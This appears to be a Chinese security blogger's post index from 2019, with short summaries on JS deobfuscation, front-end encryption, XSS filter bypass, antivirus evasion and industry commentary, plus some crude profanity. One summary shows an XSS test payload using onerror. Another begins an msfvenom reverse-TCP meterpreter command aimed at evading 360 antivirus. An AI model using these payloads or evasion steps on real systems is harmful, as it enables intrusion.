摘要: https://github.com/svent/jsdetox 这个是一个比较好的反混淆,针对前端加密还是可以调试的 就是安装比较傻逼,需要bundler1.0左右,老子安装了半天没安装上,我曹你吗的 ruby gem 这个垃圾社区 操你吗! 真的是找骂 一个地址换2次。。。 资料这找不到 那 找 阅读全文
posted @ 2019-08-06 22:30 xsser's 阅读(1538) 评论(0) 推荐(0) 编辑
摘要: 前端加密之使用firefox来解密 文本采用(CC-BY-NC-ND) 非商用可转载,不可修改本文内容 随着等保2.0的实施,传输过程中加密变的必要了,很多APP或者手机浏览器端逐步加密了一些加密的措施来解决这个问题,比如以下这样的数据包 一串乱码,什么是什么都看不懂别说修改数据了。。那咋办呢? 我 阅读全文
posted @ 2019-07-25 18:14 xsser's 阅读(1359) 评论(0) 推荐(0) 编辑
摘要: 文本采用(CC-BY-NC-ND) 非商用可转载,不可修改本文内容 这是一篇翻译文章,翻译加自己的理解。嗯 不是机器翻译 是我理解后的翻译 谢谢 顺便我会尽可能加上场景和一些业务实际情况解读 原文叫做《Bypassing XSS Detection Mechanisms 》,是个pdf。。。 到时候 阅读全文
posted @ 2019-04-21 23:40 xsser's 阅读(2667) 评论(1) 推荐(0) 编辑
摘要: 原文地址是:https://medium.com/@y.shahinzadeh/chaining-multiple-vulnerabilities-waf-bypass-to-account-takeover-in-almost-all-alibabas-websites-f8643eaa2855 阅读全文
posted @ 2019-04-16 02:27 xsser's 阅读(1307) 评论(0) 推荐(0) 编辑
摘要: 卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能免杀 突然看到一个帖子 很牛逼 依然到现在还是免杀的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.1 阅读全文
posted @ 2019-04-13 23:49 xsser's 阅读(1067) 评论(0) 推荐(0) 编辑
摘要: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018 在P神的小密圈里有他相关的解读,当然解读归解读,自己的理解归自己的理解。 等抽空写一下 阅读全文
posted @ 2019-04-11 23:39 xsser's 阅读(222) 评论(0) 推荐(0) 编辑
摘要: <img/src=aaa.jpg onerror=prompt(1); </form> 测试了下 这个编辑器支持img动态加载一些html标签 data-mce-json 对 就是这个属性。。。 然后动态加载的标签。。。好像对转义没做好,dom下 加载&nbsi之类的 转义后的也可以被执行的。。。 阅读全文
posted @ 2019-04-10 20:00 xsser's 阅读(267) 评论(0) 推荐(0) 编辑
摘要: 在安恒接触的安全编程教育 主要做了几件事 我创建了一个叫“月赛”的模式,其实这个在acm之类的其他方向也有了,月赛通过免费的方式引入流量沉淀,在直播等下游进行收费,通过复现等方式提供有价值的内容。 主要的价值在于知识,这是真的知识付费。 这个有啥好处呢,相比传统的线下授课,这个方式节约双方的成本,用 阅读全文
posted @ 2019-04-10 18:45 xsser's 阅读(526) 评论(0) 推荐(0) 编辑
摘要: 安全圈有一个非常有趣的现象,那就是朋友圈没人发 没一个人发 那这个就没什么人关注 CVE-2019-3396 这个出来2个礼拜了 有人开始刷Twitter看到分析文章了才到朋友圈 然后朋友圈才有人开始分析,然后乙方看到有同行分析了才分析然后发通告。 interesting!!!! ^^ https: 阅读全文
posted @ 2019-04-10 17:28 xsser's 阅读(1001) 评论(0) 推荐(0) 编辑
摘要: 本人上个公司是杭州安恒。 最近安恒要上市了,看了下招股书和财务说明,其中最重要的也就是企业的净利润能力,在A股 需要连续5年净利润大于1个亿 但是大家可以看下启明 绿盟 等同行都没有可以上A股的主板 原因就是网络安全不是一个非常大的市场。 看了下上市募集的资金的用途都是一些其他的大型项目。 本人以前 阅读全文
posted @ 2019-04-10 17:22 xsser's 阅读(429) 评论(0) 推荐(0) 编辑